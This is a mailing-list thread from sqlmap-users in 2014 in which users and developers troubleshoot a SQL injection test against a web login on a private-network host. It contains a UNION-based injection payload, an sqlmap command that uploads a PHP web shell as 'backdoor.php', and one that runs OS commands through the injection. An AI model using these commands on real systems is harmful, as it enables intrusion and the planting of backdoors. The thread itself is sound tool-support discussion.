Re: [sqlmap-users] File Write Error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] File Write Error
|
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:26:51
|
I did not read your first email, so ignore my blitherings :) On Fri, Mar 21, 2014 at 1:16 PM, Brandon Perry <bpe...@gm...>wrote: > Brian, > > I expect the program is taking the input for username and truncating it, > so ZAP sees the injection going in and a successful auth afterwards and > assumes the payload worked. I think this is a poor assumption to make. > > > On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> There is always a 302 redirect, so I am not sure how ZAP detected this as >> a SQLi. >> >> Kind regards, >> Miroslav Stampar >> >> >> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: >> >>> Thanks for the quick response, Miroslav and Bernardo. It's very much >>> appreciated! There is a UNION technique that is being reported by ZAP, but >>> sqlmap isn't finding it and I haven't quite figured out how to simply tell >>> it what to use explicitly. ZAP detects a UNION vulnerability on >>> activate.php: >>> >>> >>> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" >>> >>> My attempts to input this have not been successful, so I'm not sure if >>> it's a false positive or I'm not using sqlmap quite right (more likely) . >>> >>> CMDLINE >>> sqlmap -u "http://172.16.71.138:7879/activate.php" >>> --data='act=auth-login&page=login&username=admin&password=admin' -p >>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >>> /usr/share/webshells/php/simple-backdoor.php --file-dest >>> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL >>> select NULL --" >>> >>> As for the previous method, here's the attached file (on screen output >>> was massive - password is "password"). End result "[09:01:51] [CRITICAL] >>> all tested parameters appear to be not injectable. Also, you can try to >>> rerun by providing either a valid value for option '--string' (or >>> '--regexp')" >>> >>> Thanks for the help! >>> >>> Brian >>> >>> >>> >>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < >>> ber...@gm...> wrote: >>> >>>> On 21 March 2014 11:57, Bernardo Damele A. G. < >>>> ber...@gm...> wrote: >>>> > [...] >>>> > All in all, can you please relaunch sqlmap (make sure you run git pull >>>> > first to sync to the GitHub repository) with the following syntax: >>>> >>>> Command line: >>>> >>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >>>> --data="act=auth-login&pag=login&username=admin&password=admin" -p >>>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >>>> --parse-errors -t traffic.log --answers "language does the web server >>>> support=4,do you want to use for writable=2,comma separate list of >>>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >>>> >>>> Feel free to report back the result, the entire standard output of >>>> sqlmap and send me the traffic.log. >>>> >>>> Thank you. >>>> Bernardo >>>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and >>> their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
